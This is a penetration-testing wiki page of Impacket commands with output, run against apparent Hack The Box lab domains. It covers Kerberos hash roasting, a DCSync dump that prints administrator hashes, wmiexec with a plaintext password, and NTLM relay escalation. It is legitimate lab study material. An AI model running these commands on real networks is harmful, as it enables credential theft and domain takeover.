❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Lookup SID
  • GetNPUsers
  • GetUserSPN
  • GetADUsers
  • WMIexec
  • Secretdump - DSYNC
  • SMBServer
  • NTLM relay

Was this helpful?

  1. Infrastructure Pentesting
  2. Active Directory (AD)

Impacket

PreviousSMB RelayNextBloodhound

Last updated 1 year ago

Was this helpful?

Impacket in Kali linux is present here

/usr/share/doc/python3-impacket/examples

Lookup SID

└─# python3 ./lookupsid.py hazard:stealth1agent@10.129.96.157           
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

GetNPUsers

Identify users which do not require Kerberos preauthentication (to get TGT ticket)

impacket-GetNPUsers domain/user -request -no-pass -dc-ip <AD-IP>
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210
#!/bin/bash
while read p; 
do 
        echo "[$p]"
        impacket-GetNPUsers egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.129.95.180 >> hash.txt;
done < ./usernames.txt

GetUserSPN

impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.129.229.121 -request     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-06-25 07:58:08.601346             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$07b7289ca17b0f3529dff209c5872316$12c0ee251b2f58e3a343efd0dcc5071c36146292f838f8bbabfe3ab7625cbda5f070abbfb731dab4179e106cdbd

GetADUsers

impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.129.229.121
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Querying 10.129.229.121 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 15:06:40.351723  2023-06-25 07:58:08.601346 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 14:50:36.972031  <never>             
SVC_TGS      

WMIexec

impacket-wmiexec active.htb/administrator:Ticketmaster1968@10.129.229.121

Secretdump - DSYNC

 impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
└─$ impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up... 

SMBServer

impacket-smbserver -smb2support share .

NTLM relay

/usr/share/doc/python3-impacket/examples/ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss